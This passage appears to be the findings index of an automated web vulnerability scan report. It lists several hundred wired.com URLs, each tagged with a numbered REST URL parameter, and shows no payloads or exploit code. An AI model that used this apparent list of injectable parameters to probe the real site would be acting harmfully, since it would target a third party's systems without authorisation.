
1.339. http://www.wired.com/science/space [REST URL parameter 1]

1.340. http://www.wired.com/science/space [REST URL parameter 2]

1.341. http://www.wired.com/search [REST URL parameter 1]

1.342. http://www.wired.com/services/corrections/ [REST URL parameter 1]

1.343. http://www.wired.com/services/corrections/ [REST URL parameter 2]

1.344. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

1.345. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

1.346. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.347. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.348. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 4]

1.349. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 5]

1.350. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 6]

1.351. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 7]

1.352. http://www.wired.com/services/email/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 8]

1.353. http://www.wired.com/services/faq/ [REST URL parameter 1]

1.354. http://www.wired.com/services/faq/ [REST URL parameter 2]

1.355. http://www.wired.com/services/feedback/general [REST URL parameter 1]

1.356. http://www.wired.com/services/feedback/general [REST URL parameter 2]

1.357. http://www.wired.com/services/feedback/general [REST URL parameter 3]

1.358. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 1]

1.359. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 2]

1.360. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 3]

1.361. http://www.wired.com/services/newsletters [REST URL parameter 1]

1.362. http://www.wired.com/services/newsletters [REST URL parameter 2]

1.363. http://www.wired.com/services/press/ [REST URL parameter 1]

1.364. http://www.wired.com/services/press/ [REST URL parameter 2]

1.365. http://www.wired.com/services/privacy/ [REST URL parameter 1]

1.366. http://www.wired.com/services/privacy/ [REST URL parameter 2]

1.367. http://www.wired.com/services/rss/ [REST URL parameter 1]

1.368. http://www.wired.com/services/rss/ [REST URL parameter 2]

1.369. http://www.wired.com/services/sitemap/ [REST URL parameter 1]

1.370. http://www.wired.com/services/sitemap/ [REST URL parameter 2]

1.371. http://www.wired.com/services/staff/ [REST URL parameter 1]

1.372. http://www.wired.com/services/staff/ [REST URL parameter 2]

1.373. http://www.wired.com/services/useragreement/ [REST URL parameter 1]

1.374. http://www.wired.com/services/useragreement/ [REST URL parameter 2]

1.375. http://www.wired.com/software [REST URL parameter 1]

1.376. http://www.wired.com/software/ [REST URL parameter 1]

1.377. http://www.wired.com/software/coolapps [REST URL parameter 1]

1.378. http://www.wired.com/software/coolapps [REST URL parameter 2]

1.379. http://www.wired.com/software/softwarereviews [REST URL parameter 1]

1.380. http://www.wired.com/software/softwarereviews [REST URL parameter 2]

1.381. http://www.wired.com/software/webservices [REST URL parameter 1]

1.382. http://www.wired.com/software/webservices [REST URL parameter 2]

1.383. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 1]

1.384. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

1.385. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 2]

1.386. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

1.387. http://www.wired.com/special_multimedia/2008/ff_futurefood_1611 [REST URL parameter 3]

1.388. http://www.wired.com/support/feedback.html [REST URL parameter 1]

1.389. http://www.wired.com/support/feedback.html [REST URL parameter 1]

1.390. http://www.wired.com/support/feedback.html [REST URL parameter 2]

1.391. http://www.wired.com/support/feedback.html [REST URL parameter 2]

1.392. http://www.wired.com/techbiz [REST URL parameter 1]

1.393. http://www.wired.com/techbiz/ [REST URL parameter 1]

1.394. http://www.wired.com/techbiz/it [REST URL parameter 1]

1.395. http://www.wired.com/techbiz/it [REST URL parameter 2]

1.396. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 1]

1.397. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 2]

1.398. http://www.wired.com/techbiz/it/magazine/16-05/mf_amazon [REST URL parameter 3]

1.399. http://www.wired.com/techbiz/media [REST URL parameter 1]

1.400. http://www.wired.com/techbiz/media [REST URL parameter 2]

1.401. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 1]

1.402. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 2]

1.403. http://www.wired.com/techbiz/media/news/2005/01/66333 [REST URL parameter 3]

1.404. http://www.wired.com/techbiz/people [REST URL parameter 1]

1.405. http://www.wired.com/techbiz/people [REST URL parameter 2]

1.406. http://www.wired.com/techbiz/startups [REST URL parameter 1]

1.407. http://www.wired.com/techbiz/startups [REST URL parameter 2]

1.408. http://www.wired.com/user/login [REST URL parameter 1]

1.409. http://www.wired.com/user/login [REST URL parameter 2]

1.410. http://www.wired.com/user/logout [REST URL parameter 1]

1.411. http://www.wired.com/user/logout [REST URL parameter 2]

1.412. http://www.wired.com/user/registration [REST URL parameter 1]

1.413. http://www.wired.com/user/registration [REST URL parameter 2]

1.414. http://www.wired.com/video [REST URL parameter 1]

1.415. http://www.wired.com/video/ [REST URL parameter 1]

1.416. http://www.wired.com/video/alt-text [REST URL parameter 1]

1.417. http://www.wired.com/video/alt-text [REST URL parameter 1]

1.418. http://www.wired.com/video/alt-text [REST URL parameter 2]

1.419. http://www.wired.com/video/alt-text [REST URL parameter 2]

1.420. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

1.421. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 1]

1.422. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

1.423. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

1.424. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

1.425. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

1.426. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

1.427. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

1.428. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

1.429. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

1.430. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

1.431. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

1.432. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

1.433. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

1.434. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

1.435. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

1.436. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

1.437. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 3]

1.438. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.439. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.440. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.441. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

1.442. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.443. http://www.wired.com/video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 3]

1.444. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.445. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 1]

1.446. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.447. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 2]

1.448. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.449. http://www.wired.com/video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 [REST URL parameter 3]

1.450. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

1.451. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 1]

1.452. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

1.453. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 2]

1.454. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

1.455. http://www.wired.com/video/behind-the-scenes-with-jj-abrams/20039390001 [REST URL parameter 3]

1.456. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

1.457. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 1]

1.458. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

1.459. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 2]

1.460. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

1.461. http://www.wired.com/video/calibrate-the-blues-away/4569448001 [REST URL parameter 3]

1.462. http://www.wired.com/video/culture [REST URL parameter 1]

1.463. http://www.wired.com/video/culture [REST URL parameter 2]

1.464. http://www.wired.com/video/culture [REST URL parameter 2]

1.465. http://www.wired.com/video/events [REST URL parameter 1]

1.466. http://www.wired.com/video/events [REST URL parameter 2]

1.467. http://www.wired.com/video/events [REST URL parameter 2]

1.468. http://www.wired.com/video/gadgets [REST URL parameter 1]

1.469. http://www.wired.com/video/gadgets [REST URL parameter 2]

1.470. http://www.wired.com/video/gadgets [REST URL parameter 2]

1.471. http://www.wired.com/video/gaming [REST URL parameter 1]

1.472. http://www.wired.com/video/gaming [REST URL parameter 2]

1.473. http://www.wired.com/video/gaming [REST URL parameter 2]

1.474. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

1.475. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 1]

1.476. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

1.477. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 2]

1.478. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

1.479. http://www.wired.com/video/harry-potter-and-the-halfblood-prince/14545305001 [REST URL parameter 3]

1.480. http://www.wired.com/video/howto [REST URL parameter 1]

1.481. http://www.wired.com/video/howto [REST URL parameter 2]

1.482. http://www.wired.com/video/howto [REST URL parameter 2]

1.483. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

1.484. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 1]

1.485. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

1.486. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 2]

1.487. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

1.488. http://www.wired.com/video/institute-for-business--home-safety/619269818001 [REST URL parameter 3]

1.489. http://www.wired.com/video/interviews [REST URL parameter 1]

1.490. http://www.wired.com/video/interviews [REST URL parameter 2]

1.491. http://www.wired.com/video/interviews [REST URL parameter 2]

1.492. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

1.493. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 1]

1.494. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

1.495. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

1.496. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

1.497. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

1.498. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 4]

1.499. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 5]

1.500. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 6]

1.501. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

1.502. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

1.503. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

1.504. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

1.505. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

1.506. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

1.507. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 4]

1.508. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 5]

1.509. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 6]

1.510. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.511. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.512. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.513. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.514. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.515. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.516. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

1.517. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

1.518. http://www.wired.com/video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

1.519. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.520. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 1]

1.521. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.522. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 2]

1.523. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.524. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 3]

1.525. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 4]

1.526. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 5]

1.527. http://www.wired.com/video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 [REST URL parameter 6]

1.528. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.529. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 1]

1.530. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.531. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 2]

1.532. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.533. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 3]

1.534. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 4]

1.535. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 5]

1.536. http://www.wired.com/video/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 [REST URL parameter 6]

1.537. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.538. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 1]

1.539. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.540. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 2]

1.541. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.542. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 3]

1.543. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 4]

1.544. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 5]

1.545. http://www.wired.com/video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 [REST URL parameter 6]

1.546. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.547. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 1]

1.548. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.549. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 2]

1.550. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.551. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 3]

1.552. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 4]

1.553. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 5]

1.554. http://www.wired.com/video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 [REST URL parameter 6]

1.555. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.556. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 1]

1.557. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.558. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 2]

1.559. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.560. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 3]

1.561. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 4]

1.562. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 5]

1.563. http://www.wired.com/video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 [REST URL parameter 6]

1.564. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.565. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 1]

1.566. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.567. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 2]

1.568. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.569. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 3]

1.570. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 4]

1.571. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 5]

1.572. http://www.wired.com/video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 [REST URL parameter 6]

1.573. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

1.574. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 1]

1.575. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

1.576. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 2]

1.577. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

1.578. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 3]

1.579. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 4]

1.580. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 5]

1.581. http://www.wired.com/video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 [REST URL parameter 6]

1.582. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

1.583. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 1]

1.584. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

1.585. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 2]

1.586. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

1.587. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 3]

1.588. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 4]

1.589. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 5]

1.590. http://www.wired.com/video/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 [REST URL parameter 6]

1.591. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

1.592. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

1.593. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.594. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

1.595. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.596. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

1.597. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

1.598. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

1.599. http://www.wired.com/video/latest-videos/highlights/1716440574/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

1.600. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 1]

1.601. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 1]

1.602. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 2]

1.603. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 2]

1.604. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 3]

1.605. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 3]

1.606. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 4]

1.607. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 5]

1.608. http://www.wired.com/video/latest-videos/latest/1815816633/a-walle-for-roadside-bombs/660653911001 [REST URL parameter 6]

1.609. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 1]

1.610. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 1]

1.611. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 2]

1.612. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 2]

1.613. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 3]

1.614. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 3]

1.615. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 4]

1.616. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 5]

1.617. http://www.wired.com/video/latest-videos/latest/1815816633/back-to-the-future-physics-the-river-of-time/653293411001 [REST URL parameter 6]

1.618. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.619. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 1]

1.620. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.621. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 2]

1.622. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.623. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 3]

1.624. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 4]

1.625. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 5]

1.626. http://www.wired.com/video/latest-videos/latest/1815816633/battle-los-angeles-trailer/676257685001 [REST URL parameter 6]

1.627. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.628. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 1]

1.629. http://www.wired.com/video/latest-videos/latest/1815816633/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 [REST URL parameter 2]

